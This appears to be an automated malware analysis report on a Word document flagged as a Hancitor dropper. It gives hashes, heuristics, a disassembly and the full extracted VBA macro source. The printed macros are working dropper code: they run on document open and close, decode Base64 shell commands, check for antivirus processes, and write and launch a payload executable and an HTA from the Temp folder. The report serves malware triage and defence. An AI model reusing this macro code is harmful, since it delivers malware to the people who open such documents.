Office (OLE) malware analysis — malicious · 77c930bfbf405087

MALICIOUS

Office (OLE)

200.5 KB Created: 2018-07-24 11:02:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 187d20d7bb1b84445587a7072202d8d0 SHA-1: 1bb46c2a04c7ed0a624d827de84c69372c392df5 SHA-256: 77c930bfbf405087f59a279927f32450362a47269237525318dc5d22094a331b

620 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The sample contains VBA macros, including a Document_Open macro that executes a Base64-decoded command. This command uses cmd.exe to execute a ping command, likely as a delay mechanism before further execution. The script also attempts to use WMI to launch a process and save the document as an XML document, potentially to facilitate execution. The presence of Ole10Native packaging and ClamAV detection as 'Doc.Dropper.Hancitor' suggests a dropper functionality.

Heuristics 17

OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0

XOR-encoded strings (key 0x30) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x30: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

Attempted x86 opcode disassembly

0001D66A  7c5f              jl 0x1d6cb
0001D66C  51                push ecx
0001D66D  54                push esp
0001D66E  7c59              jl 0x1d6c9
0001D670  52                push edx
0001D671  42                inc edx
0001D672  51                push ecx
0001D673  42                inc edx
0001D674  49                dec ecx
0001D675  7130              jno 0x1d6a7
0001D677  b3f0              mov bl, 0xf0
0001D679  33b9b528cfcf      xor edi, dword ptr [ecx - 0x3030d74b]
0001D67F  cf                iretd
0001D680  68bbb528cf        push 0xcf28b5bb
0001D685  cf                iretd
0001D686  cf                iretd
0001D687  60                pushal
0001D688  bb7dc061cf        mov ebx, 0xcf61c07d
0001D68D  65e8b9b504cf      call 0xcf068c4c
0001D693  cf                iretd
0001D694  cf                iretd
0001D695  60                pushal
0001D696  d830              fdiv dword ptr [eax]
0001D698  3030              xor byte ptr [eax], dh
0001D69A  3068db            xor byte ptr [eax - 0x25], ch
0001D69D  3d66594244        cmp eax, 0x44425966
0001D6A2  45                inc ebp
0001D6A3  51                push ecx
0001D6A4  5c                pop esp
0001D6A5  715c              jno 0x1d703
0001D6A7  5c                pop esp
0001D6A8  5f                pop edi
0001D6A9  53                push ebx
0001D6AA  30b3f033b9b5      xor byte ptr [ebx - 0x4a46cc10], dh
0001D6B0  08cf              or bh, cl
0001D6B2  cf                iretd
0001D6B3  cf                iretd
0001D6B4  68bba508cf        push 0xcf08a5bb
0001D6B9  cf                iretd
0001D6BA  cf                iretd
0001D6BB  62bb75c060cf      bound edi, qword ptr [ebx - 0x309f3f8b]
0001D6C1  65e8b9758860      call 0x608a4c80
0001D6C7  d830              fdiv dword ptr [eax]
0001D6C9  30                .byte 0x30

Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

For Each x In yrtfdsad
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim pipec As Boolean: pipec = True

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZX …

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6529 bytes
SHA-256: `a6a399d844911240fdc2c93c987153a5fbe365a1253cc1af79970773c96d0baa`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set D = New DataObject D.SetText " " D.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 15, t) Dim kjfaa kjfaa = "bd" & "agent.exe" Dim yrtfdsad, vcxvxczcv Dim mbbmbdf Set vcxvxczcv = GetObject("wi" & "nmgmts:") Dim gfdfsfsfs Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process") Dim hdffsdfs For Each x In yrtfdsad Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text) Dim pipec As Boolean: pipec = True If x.Name = kjfaa Then Dim lhjxvcvx lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode) Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, lhjxvcvx Close #1 ChDir Environ("Temp") wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If If x.Name = "n360.exe" Then Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() ChDir Environ("Temp") Selection.TypeBackspace Call kklk Call fadf End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub fadf() kk = ".p" & "if" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif" End Sub Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{F3E33E4A-DFC0-4026-8E0A-92737009538B}{28A0BE8C-CC82-4B6A-A0CE-709662DE72B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{45DEC472-31EA-41AB-8DC2-15889D40DEF0}{E8B31496-3A16-4F88-85AA-67164B5AE72A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module5" Sub kklk() ChDir Environ("Temp") Dim kk, lll, jgf, tyretw, gdfsfsa jgf = "x" & "e" kk = ".p" & "if" lll = "6" & ".e" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{F00FB9D4-AC2A-420C-8F44-48EFF1381150}{55A426A6-DEEE-4BCB-A437-FD01CC4D64FB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm4" Attribute VB_Base = "0{A5384945-3F54-4AB2-B715-590CC4CDCA24}{2017D4D8-067C-4576-A22B-F56E75BB2ACA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1600608157/Ole10Native	66773 bytes
SHA-256: `e3e5de755478d928b6f6ab3dc3bbea93ab957814110850ce8f7c773036d13ccc`

Open this report in the interactive analyzer, or submit your own file for analysis.